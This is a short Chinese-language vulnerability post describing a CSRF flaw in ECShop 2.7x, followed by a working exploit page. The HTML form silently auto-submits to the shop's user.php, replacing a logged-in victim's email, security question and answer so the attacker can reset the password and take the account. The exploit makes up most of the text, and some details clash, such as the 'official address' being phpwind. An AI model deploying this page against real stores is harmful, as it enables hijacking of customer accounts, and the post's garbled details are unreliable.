发布日期:2010-10.04发布作者:结界师
影响版本:ecshop 2.7x官方地址:phpwind
漏洞类型:CSRF攻击漏洞描述:ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
漏洞exp:
<html><body>
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
<INPUT TYPE="text" NAME="act" value="act_edit_profile">
<INPUT TYPE="text" NAME="sel_question" value="ecshop">
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
</body>
<script>
document.forms[0].submit();
</script>
</html>
标签分类: 脚本漏洞 ECShop CSRF
也不要说曾经失去,失去的不是永远失去,得到的不是永远拥有,